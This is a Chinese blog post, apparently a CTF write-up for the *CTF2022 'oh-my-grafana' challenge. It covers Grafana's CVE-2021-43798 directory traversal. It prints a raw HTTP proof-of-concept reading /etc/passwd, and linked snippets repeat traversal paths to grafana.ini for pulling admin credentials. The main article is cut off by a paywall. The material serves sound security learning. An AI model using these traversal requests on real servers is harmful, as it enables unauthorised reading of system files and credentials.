*CTF2022 oh-my-grafana

原创 已于 2022-04-20 09:38:02 修改 · 3.8k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF #Web

于 2022-04-19 10:10:33 首次发布
本文详细介绍了Grafana的CVE-2021-43798漏洞,该漏洞允许未经授权的任意文件读取。通过POC,作者展示了如何读取系统敏感信息,如/etc/passwd和配置文件。通过对比全局和默认配置文件,揭示了admin密码,从而成功登录。此外,还探讨了利用该漏洞获取MySQL数据库信息的可能性。

*CTF2022 oh-my-grafana

文章目录

CVE-2021-43798

版本号为8.2.6,存在任意文件读取漏洞,CVE-2021-43798
Grafana 未经授权的任意文件读取漏洞复现

可以打通,用这个poc

GET /public/plugins/welcome/../../../../../../../../../etc/passwd HTTP/1.1
Host: 124.71.184.1:3000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.39
Accept: text/html,application/xhtml+xml,application/xml;q
最低0.47元/天 解锁文章
【漏洞复现】CVE-2024-9264 - Grafana SQL 表达式远程代码执行漏洞
渗透之路,攻防之间皆学问
12-19 2302
DuckDB 是一个轻量级、高性能的嵌入式 SQL 数据库无服务器架构:DuckDB 不需要独立的数据库服务器,它是嵌入式的,直接以二进制文件的形式集成到应用程序中,适合嵌入到各种数据处理工具和应用中。高效的分析功能:它优化了 SQL 查询的性能,尤其在大数据量分析、聚合和联接操作时表现优异,适合数据科学家和分析师使用。完全支持 SQL:支持标准 SQL 语法,用户可以方便地进行复杂的查询,提供类似于大数据系统的分析能力,但不需要大规模的基础设施。文件支持。
*ctf2022-web-oh-my-grafana
qq_43200143的博客
04-19 3693
*ctf2022-web-oh-my-grafana 学到的东西 1.fuzz ,自动化fuzz可能存在的文件,这个需要自己积累,以及提前准备好!包括工具和字典. 2.漏洞库的准备,开始时可以进行快速搜索 对于一些针对开源的软件或者有安装包的,可以自己搭建本地环境,来查看可能存在的漏洞 题目一上来是一个grafana的登陆页面,这个之前有接触过,这个应用存在漏洞. 点击forget password后可以看到,下面给到了版本 在进行一番信息收集后,通过searchsploit和搜索引擎搜索,发现存在一个
*CTFoh-my-grafana
aoao331198的博客
04-17 1938
Grafana任意文件读取漏洞(CVE-2021-43798) 有空另一个blog里复现一波,这里直接写wp /public/plugins/alertlist/…/…/…/…/…/…/…/…/…/…/…/etc/grafana/grafana.ini 查看配置文件 在配置文件里面可以找到admin的默认密码 成功登录进去后,尝试根据配置文件中的数据库信息登录数据库 然后在explore中可以得到flag ...
grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程
05-26 1万+
漏洞名称: grafana 目录遍历 (CVE-2021-43798) 漏洞描述: Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<grafana_host_url>/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7...
*CTF2022 - Web
weixin_51804748的博客
04-17 3165
oh-my-grafana Grafana是一款用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。 本题使用的Grafana版本为8.2.6,存在任意文件读取的漏洞(CVE-2021-43798) 由于本题需要登录,首先考虑能不能读取到grafana.ini,获取用户名和密码 在ini文件中搜索得到admin的用户名和密码,成功登录 [security] # disable creation of admin user on first start of grafana ;di
grafana原始配置(运行成功)和对应docker成功日志
技术小站
06-30 2388
##################### Grafana Configuration Example ##################### # # Everything has defaults so you only need to uncomment things you want to # change # possible values : production, develo...
XCTF-*CTF2022-Alice系列挑战write up
qq_42940521的博客
04-18 7851
*CTF2022 Alice系列题目write up
### CTF-All-In-One 超全学习文档资料
最新发布
04-13
内容概要:本文档《ctf-all-in-one.pdf》是一份全面的CTF(夺旗赛)学习指南,涵盖了CTF的基础知识、各类题型、常用工具、高级技术和实战技巧。文档首先介绍了CTF的概念及其发展历史,解释了CTF比赛的形式和规则,...
ctf-all-in-one
01-30
ctf-all-in-one
*CTF 2022web(CVE-2021-43798)
……
09-04 1613
CVE-2021-43798漏洞复现 *CTF 2022web
Grafana任意文件读取漏洞(CVE-2021-43798)
不光要学,知识要能说出口
12-08 1178
Grafana任意文件读取漏洞(CVE-2021-43798) goby exp声明代码poc集合 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Grafana Plugins Arbitrary File Read CVE-2021-43798", "Level": "3", "Tags": [ "fileread" ],
【漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)
热门推荐
qq_45244158的博客
12-09 1万+
Grafana 任意文件读取漏洞复现(CVE-2021-43798)
部署prometheus
ctf059的博客
05-04 653
部署prometheus Prometheus介绍 Prometheus是SoundCloud开发的一个监视系统和时间序列数据库,开源。 K8S搭配Prometheus进行监控,google BorgMon监控开源 prometheus的主要特点 1.自定义多维数据模型 2.非常高效的存储,平均一个采样数据占~3.5bytes左右 3.在多维度上灵活且强大的查询语言(PromQI) 4.不依赖分布式存储,支持单主节点工作通过基于HTTP的pull方式采集时序数据,可通过push gateway进行时序列数据
CVE-2021-43798 Grafana 未授权任意文件读取漏洞
dreamthe的博客
12-08 6848
1.漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 该漏洞危害等级:高危 2.FOFA 查询 app="Grafana" 3.影响范围 根据FOFA最新数据,使用数量前三分别是:美国(67057),中国(30812),德国(25397) 经测试,目前最新版本(Grafana v8.2
[2022-* CTF]-WEB
qq_53142368的博客
06-07 717
这次比赛体验也还行,题目质量出的很高,把wp记录下来 WEBoh-my-grafana 这个题目考的是grafana任意文件读取漏洞(CVE-2021-43798) 2021年12月6日,国外安全研究人员检测出grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。 读取敏感文件复现poc: /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertli
Prometheus+Grafana概述
afei001
06-11 551
目录 1.Prometheus概述 2.Prometheus架构图解 (1)Prometheus Server (2)Exporters (3)AlertManager (4)PushGateway (5)Prometheus web UI 3.Prometheus工作流程 4.Prometheus特点 5.Grafana概述 1.Prometheus概述 Prometheus(普罗米修斯)是一套开源的监控、报警、时间序列数据库的组合,起始是由SoundClou...
【渗透测试】Grafana_8.x 任意文件读取批量检测
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
12-08 703
【渗透测试】Grafana_8.x 任意文件读取批量检测 用法: grafana_publics.txt 中放置对应的模块 “grafana” ip+port.txt 中放置需要检查的ip,默认端口80,修改端口需要添加在后面 “127.0.0.1:3000” python3 grafana_check_ip+port.py Grafana_8.x_vuln_out.txt 保存输出结果 # -*- encoding: utf-8 -*- # Time : 2021/12/07 23:05:31 # gra
漏洞分析|CVE-2021-43798 - Grafana文件读取漏洞
weixin_42508548的博客
12-21 3232
下午的时候,群里突然看到这样一条信息...... 貌似是某个0day漏洞被公开了。。。因为前几天刚分析完泛微的漏洞,发现在分析过程中会发现一些有趣的东西,所以这里也尝试进行了分析。当然,在分析之前,还是先自己打一遍,熟悉一下。 0x02 环境搭建&漏洞复现 1、一开始其实我是不知道Grafana是什么的,也如群里师傅说的那样,让我猜,emm...,然后就是万能百度了 2、大概理解了一下,Grafana是一个完全开源的度量分析与可视化平台,可对来自各种各种数据源的数据进行查询、分
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值